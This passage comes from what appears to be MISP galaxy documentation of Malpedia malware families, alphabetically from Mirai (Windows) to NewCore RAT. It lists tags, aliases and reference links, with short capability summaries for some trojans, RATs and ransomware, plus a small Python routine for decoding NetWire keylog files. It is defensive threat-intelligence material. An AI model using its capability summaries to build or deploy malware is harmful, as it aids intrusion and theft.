The tag is: `misp-galaxy:malpedia="Mirai (Windows)"`

Mirai (Windows) is also known as:

Table 2107. Table References

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Misdat

The tag is: `misp-galaxy:malpedia="Misdat"`

Misdat is also known as:

Table 2108. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat">https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat</a></td>
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Misfox

The tag is: `misp-galaxy:malpedia="Misfox"`

Misfox is also known as:

- MixFox
- ModPack

Table 2109. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox">https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox</a></td>
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Mispadu

According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

The tag is: `misp-galaxy:malpedia="Mispadu"`

Mispadu is also known as:

- URSA
**Table 2110. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu">https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu</a></td>
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**MISTYVEAL**

The tag is: `misp-galaxy:malpedia="MISTYVEAL"`

MISTYVEAL is also known as:

**Table 2111. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mistyveal">https://malpedia.caad.fkie.fraunhofer.de/details/win.mistyveal</a></td>
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<tr>
<td><a href="https://www.epicturla.com/previous-works/hitb2020-voltron-sta">https://www.epicturla.com/previous-works/hitb2020-voltron-sta</a></td>
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**Miuref**

The tag is: `misp-galaxy:malpedia="Miuref"`

Miuref is also known as:

**Table 2112. Table References**

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**MM Core**

The tag is: `misp-galaxy:malpedia="MM Core"`

MM Core is also known as:

**Table 2113. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core">https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core</a></td>
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**MobiRAT**

The tag is: `misp-galaxy:malpedia="MobiRAT"`

MobiRAT is also known as:
**Mocton**

The tag is: `misp-galaxy:malpedia="Mocton"`

Mocton is also known as:

**ModPipe**

The tag is: `misp-galaxy:malpedia="ModPipe"`

ModPipe is also known as:

- straxbot

**ModPOS**

The tag is: `misp-galaxy:malpedia="ModPOS"`

ModPOS is also known as:

- straxbot
Moker

The tag is: misp-galaxy:malpedia="Moker"

Moker is also known as:

Table 2118. Table References

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<tr>
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<td><a href="https://breakingmalware.com/malware/moker-part-2-capabilities/">https://breakingmalware.com/malware/moker-part-2-capabilities/</a></td>
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<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/">https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/</a></td>
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<tr>
<td><a href="http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network">http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network</a></td>
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Mokes (Windows)

The tag is: misp-galaxy:malpedia="Mokes (Windows)"

Mokes (Windows) is also known as:

Table 2119. Table References

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Mole

The tag is: misp-galaxy:malpedia="Mole"

Mole is also known as:

Table 2120. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mole">https://malpedia.caad.fkie.fraunhofer.de/details/win.mole</a></td>
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</table>
MoleNet

MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017.

The tag is: misp-galaxy:malpedia="MoleNet"

MoleNet is also known as:

Table 2121. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet">https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet</a></td>
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Molerat Loader

The tag is: misp-galaxy:malpedia="Molerat Loader"

Molerat Loader is also known as:

Table 2122. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader">https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader</a></td>
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<td><a href="http://www.clearskysec.com/iec/">http://www.clearskysec.com/iec/</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/">https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/</a></td>
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Monero Miner

The tag is: misp-galaxy:malpedia="Monero Miner"

Monero Miner is also known as:

- CoinMiner

Table 2123. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner">https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner</a></td>
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<td><a href="https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/">https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/</a></td>
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MontysThree

The tag is: *misp-galaxy:malpedia="MontysThree"

MontysThree is also known as:

- MT3

*Table 2124. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree">https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree</a></td>
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<td><a href="https://securelist.com/montysthree-industrial-espionage/98972/">https://securelist.com/montysthree-industrial-espionage/98972/</a></td>
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MoonWind

The tag is: *misp-galaxy:malpedia="MoonWind"

MoonWind is also known as:

*Table 2125. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind">https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind</a></td>
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MoriAgent

The tag is: *misp-galaxy:malpedia="MoriAgent"

MoriAgent is also known as:

*Table 2126. Table References*

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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<td><a href="https://twitter.com/Timele9527/status/127277677635233024">https://twitter.com/Timele9527/status/127277677635233024</a></td>
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**Morphine**

The tag is: *misp-galaxy:malpedia=*Morphine*

Morphine is also known as:

**Table 2127. Table References**

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**Morto**

The tag is: *misp-galaxy:malpedia=*Morto*

Morto is also known as:

**Table 2128. Table References**

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**Mosquito**

The tag is: *misp-galaxy:malpedia=*Mosquito*

Mosquito is also known as:

**Table 2129. Table References**

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<td><a href="https://www.recordedfuture.com/turla-apt-infrastructure/">https://www.recordedfuture.com/turla-apt-infrastructure/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-hunter">https://www.secureworks.com/research/threat-profiles/iron-hunter</a></td>
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<td><a href="https://securelist.com/shedding-skin-turlas-fresh-faces/88069/">https://securelist.com/shedding-skin-turlas-fresh-faces/88069/</a></td>
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<td><a href="https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/">https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/</a></td>
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<td><a href="https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/">https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/</a></td>
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</table>
Mount Locker

The tag is: misp-galaxy:malpedia="Mount Locker"

Mount Locker is also known as:

Table 2130. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker

Moure

The tag is: misp-galaxy:malpedia="Moure"

Moure is also known as:

Table 2131. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.moure

mozart

The tag is: misp-galaxy:malpedia="mozart"

mozart is also known as:

Table 2132. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart
**MPKBot**

The tag is: *misp-galaxy:malpedia=*MPKBot*

MPKBot is also known as:

- MPK

*Table 2133. Table References*

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**MrDec Ransomware**

The tag is: *misp-galaxy:malpedia=*MrDec Ransomware*

MrDec Ransomware is also known as:

*Table 2134. Table References*

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**MrPeter**

The tag is: *misp-galaxy:malpedia=*MrPeter*

MrPeter is also known as:

*Table 2135. Table References*

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<tr>
<td><a href="https://github.com/mrfr05t/Mr.Peter">https://github.com/mrfr05t/Mr.Peter</a></td>
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**Multigrain POS**

The tag is: *misp-galaxy:malpedia=*Multigrain POS*

Multigrain POS is also known as:

*Table 2136. Table References*
murkytop

- a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.

The tag is: `misp-galaxy:malpedia="murkytop"`

murkytop is also known as:

Table 2137. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop">https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-mohawk">https://www.secureworks.com/research/threat-profiles/bronze-mohawk</a></td>
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Murofet

- The tag is: `misp-galaxy:malpedia="Murofet"`

Murofet is also known as:

Table 2138. Table References

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Mutabaha

- The tag is: `misp-galaxy:malpedia="Mutabaha"`

Mutabaha is also known as:

Table 2139. Table References

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864
**MyDogs**

The tag is: `misp-galaxy:malpedia="MyDogs"`

MyDogs is also known as:

Table 2140. Table References

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<tr>
<td><a href="https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html">https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html</a></td>
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**MyDoom**

The tag is: `misp-galaxy:malpedia="MyDoom"`

MyDoom is also known as:

- Mimail
- Novarg

Table 2141. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom">https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom</a></td>
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<td><a href="https://www.malware-traffic-analysis.net/2018/12/19/index.html">https://www.malware-traffic-analysis.net/2018/12/19/index.html</a></td>
</tr>
<tr>
<td><a href="https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503">https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503</a></td>
</tr>
<tr>
<td><a href="https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069">https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069</a></td>
</tr>
<tr>
<td><a href="http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf">http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf</a></td>
</tr>
</tbody>
</table>

**MyKings Spreader**

The tag is: `misp-galaxy:malpedia="MyKings Spreader"`
MyKings Spreader is also known as:

Table 2142. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader">https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2020/07/valak-emerges.html">https://blog.talosintelligence.com/2020/07/valak-emerges.html</a></td>
</tr>
</tbody>
</table>

MyloBot

The tag is: misp-galaxy:malpedia="MyloBot"

MyloBot is also known as:

- FakeDGA
- WillExec

Table 2143. Table References

<table>
<thead>
<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot">https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot</a></td>
</tr>
<tr>
<td><a href="https://blog.centurylink.com/mylobot-continues-global-infections/">https://blog.centurylink.com/mylobot-continues-global-infections/</a></td>
</tr>
<tr>
<td><a href="https://github.com/360netlab/DGA/issues/36">https://github.com/360netlab/DGA/issues/36</a></td>
</tr>
<tr>
<td><a href="http://www.freebuf.com/column/153424.html">http://www.freebuf.com/column/153424.html</a></td>
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</table>

MZRevenge

The tag is: misp-galaxy:malpedia="MZRevenge"

MZRevenge is also known as:

- MaMo434376
N40

Botnet with focus on banks in Latin America and South America. Relies on DLL Sideloadng attacks to execute malicious DLL files. Uses legitimate VMWare executable in attacks. As of March 2019, the malware is under active development with updated versions coming out on persistent basis.

The tag is: `misp-galaxy:malpedia="N40"`

N40 is also known as:

Table 2145. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.n40">https://malpedia.caad.fkie.fraunhofer.de/details/win.n40</a></td>
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Nabucur

The tag is: `misp-galaxy:malpedia="Nabucur"`

Nabucur is also known as:

Table 2146. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur">https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur</a></td>
</tr>
</tbody>
</table>

NACHOCHEESE

According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim's system.

The tag is: `misp-galaxy:malpedia="NACHOCHEESE"`

NACHOCHEESE is also known as:
• Cyruslish
• TWOPENCE
• VIVACIOUSGIFT

Table 2147. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese">https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/">https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/</a></td>
</tr>
<tr>
<td><a href="https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html">https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html</a></td>
</tr>
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</table>

**Nagini**

The tag is: *misp-galaxy:malpedia=*"Nagini"

Nagini is also known as:

Table 2148. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini">https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini</a></td>
</tr>
<tr>
<td><a href="http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/">http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/</a></td>
</tr>
</tbody>
</table>

**Naikon**

The tag is: *misp-galaxy:malpedia=*"Naikon"

Naikon is also known as:

Table 2149. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon">https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></td>
</tr>
<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
</tr>
</tbody>
</table>

**Nanocore RAT**

Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It has been used...
for a while by numerous criminal actors as well as by nation state threat actors.

The tag is: misp-galaxy:malpedia="Nanocore RAT"

Nanocore RAT is also known as:

- Nancrat
- NanoCore

Table 2150. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore">https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/">https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/</a></td>
</tr>
<tr>
<td><a href="https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/">https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/</a></td>
</tr>
<tr>
<td><a href="https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/">https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/</a></td>
</tr>
<tr>
<td><a href="https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52">https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage">https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</a></td>
</tr>
<tr>
<td><a href="https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332">https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332</a></td>
</tr>
<tr>
<td><a href="https://goggleheadedhacker.com/blog/post/11">https://goggleheadedhacker.com/blog/post/11</a></td>
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**NanoLocker**

The tag is: `misp-galaxy:malpedia="NanoLocker"`

NanoLocker is also known as:

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<th>Table 2151. Table References</th>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker">https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker</a></td>
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**Narilam**

The tag is: `misp-galaxy:malpedia="Narilam"`

Narilam is also known as:

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam">https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam</a></td>
</tr>
<tr>
<td><a href="http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html">http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage">https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage</a></td>
</tr>
</tbody>
</table>

**Nautilus**

The tag is: `misp-galaxy:malpedia="Nautilus"`

Nautilus is also known as:
NavRAT

The tag is: `misp-galaxy:malpedia="NavRAT"`

NavRAT is also known as:

nccTrojan

The tag is: `misp-galaxy:malpedia="nccTrojan"`

nccTrojan is also known as:

Necurs

The tag is: `misp-galaxy:malpedia="Necurs"`

Necurs is also known as:
• nucurs

Table 2156. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nucurs">https://malpedia.caad.fkie.fraunhofer.de/details/win.nucurs</a></td>
</tr>
<tr>
<td><a href="https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features">https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features</a></td>
</tr>
<tr>
<td><a href="http://blog.talosintelligence.com/2017/03/necurs-diversifies.html">http://blog.talosintelligence.com/2017/03/necurs-diversifies.html</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
<tr>
<td><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-riverview">https://www.secureworks.com/research/threat-profiles/gold-riverview</a></td>
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NedDnLoader

The tag is: *misp-galaxy:malpedia="NedDnLoader"*

NedDnLoader is also known as:

Table 2157. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader</a></td>
</tr>
<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
</tr>
</tbody>
</table>
Nefilim Ransomware

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.

The tag is: \textit{misp-galaxy:malpedia=Nefilim Ransomware}

Nefilim Ransomware is also known as:

- Nephilim Ransomware

\textit{Table 2158. Table References}

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim">https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim</a></td>
</tr>
<tr>
<td><a href="https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks">https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html">https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html</a></td>
</tr>
<tr>
<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
</tr>
<tr>
<td><a href="https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/">https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/</a></td>
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</table>
**Nemim**

The tag is: *misp-galaxy:malpedia=*Nemim"

Nemim is also known as:

- Nemain

*Table 2159. Table References*

<table>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim">https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/tungsten-bridge">https://www.secureworks.com/research/threat-profiles/tungsten-bridge</a></td>
</tr>
<tr>
<td><a href="http://blog.nsfocus.net/darkhotel-3-0908/">http://blog.nsfocus.net/darkhotel-3-0908/</a></td>
</tr>
</tbody>
</table>

**Nemty**

Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artifacts they had seen before in Gandcrab.

The tag is: *misp-galaxy:malpedia=*Nemty"

Nemty is also known as:

*Table 2160. Table References*

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty">https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty</a></td>
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<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html">https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html</a></td>
</tr>
<tr>
<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
</tr>
<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
</tr>
</tbody>
</table>
**neshta**

Neshta is a 2005 Belarusian file infector virus. The name of the virus comes from the Belarusian word "nesta" meaning "something." The program is a Windows application (exe file). Written in Delphi. The size of the original malicious file is 41,472 bytes. This file virus is the type of virus that is no longer popular at present.

The tag is: `misp-galaxy:malpedia="neshta"`

neshta is also known as:

*Table 2161. Table References*

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta">https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta</a></td>
</tr>
<tr>
<td><a href="https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest">https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest</a></td>
</tr>
</tbody>
</table>

**NESTEGG**

NESTEGG is a memory-only backdoor that can proxy commands to other infected systems using a custom routing scheme. It accepts commands to upload and download files, list and delete files, list and terminate processes, and start processes. NESTEGG also creates Windows Firewall rules that allows the backdoor to bind to a specified port number to allow for inbound traffic.

The tag is: `misp-galaxy:malpedia="NESTEGG"`

NESTEGG is also known as:

*Table 2162. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg">https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg</a></td>
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NetC

The tag is: misp-galaxy:malpedia="NetC"

NetC is also known as:

Table 2163. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.netc">https://malpedia.caad.fkie.fraunhofer.de/details/win.netc</a></td>
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NETEAGLE

The tag is: misp-galaxy:malpedia="NETEAGLE"

NETEAGLE is also known as:

• Neteagle Scout
• ScoutEagle

Table 2164. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle">https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle</a></td>
</tr>
<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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</table>

NetFlash

The tag is: misp-galaxy:malpedia="NetFlash"

NetFlash is also known as:

Table 2165. Table References

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NetKey

The tag is: `misp-galaxy:malpedia="NetKey"`

NetKey is also known as:

Table 2166. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey">https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey</a></td>
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<tr>
<td><a href="https://twitter.com/kevinperlow/status/1156406115472760835">https://twitter.com/kevinperlow/status/1156406115472760835</a></td>
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Netrepser

The tag is: `misp-galaxy:malpedia="Netrepser"`

Netrepser is also known as:

Table 2167. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger">https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger</a></td>
</tr>
<tr>
<td><a href="https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/">https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/</a></td>
</tr>
</tbody>
</table>

NetSupportManager RAT

The tag is: `misp-galaxy:malpedia="NetSupportManager RAT"`

NetSupportManager RAT is also known as:

- NetSupport

Table 2168. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat</a></td>
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NetTraveler

The tag is: `misp-galaxy:malpedia="NetTraveler"`

NetTraveler is also known as:

- TravNet

Table 2169. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler">https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler</a></td>
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</tbody>
</table>

NetWire RC

Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.

Keylog files are stored on the infected machine in an obfuscated form. The algorithm is:

```python
for i in range(0,num_read):
    buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF
```

The tag is: `misp-galaxy:malpedia="NetWire RC"`

NetWire RC is also known as:

- NetWeird
- NetWire
- Recam

Table 2170. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire">https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire</a></td>
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<td><a href="https://www.circl.lu/pub/tr-23/">https://www.circl.lu/pub/tr-23/</a></td>
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<td><a href="https://news.drweb.ru/show/?i=13281&amp;c=23">https://news.drweb.ru/show/?i=13281&amp;c=23</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/">https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data">https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data</a></td>
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<td><a href="https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html">https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html</a></td>
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<td><a href="https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/">https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/</a></td>
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<td><a href="https://news.sophos.com/en-us/2020/05/14/raticate/">https://news.sophos.com/en-us/2020/05/14/raticate/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-trinity">https://www.secureworks.com/research/threat-profiles/cobalt-trinity</a></td>
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**Neuron**

The tag is: `misp-galaxy:malpedia="Neuron"`

Neuron is also known as:
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron">https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-hunter">https://www.secureworks.com/research/threat-profiles/iron-hunter</a></td>
</tr>
<tr>
<td><a href="https://www.ncsc.gov.uk/alerts/turla-group-malware">https://www.ncsc.gov.uk/alerts/turla-group-malware</a></td>
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**Neutrino**

The tag is: **misp-galaxy:malpedia=“Neutrino”**

Neutrino is also known as:

- Kasidet

**Table 2172. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino">https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/">https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/</a></td>
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**Neutrino POS**

The tag is: **misp-galaxy:malpedia=“Neutrino POS”**
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Table 2173. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos">https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos</a></td>
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<td><a href="https://securelist.com/neutrino-modification-for-pos-terminals/78839/">https://securelist.com/neutrino-modification-for-pos-terminals/78839/</a></td>
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NewCore RAT

The tag is: `misp-galaxy:malpedia="NewCore RAT"`

NewCore RAT is also known as:

Table 2174. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat</a></td>
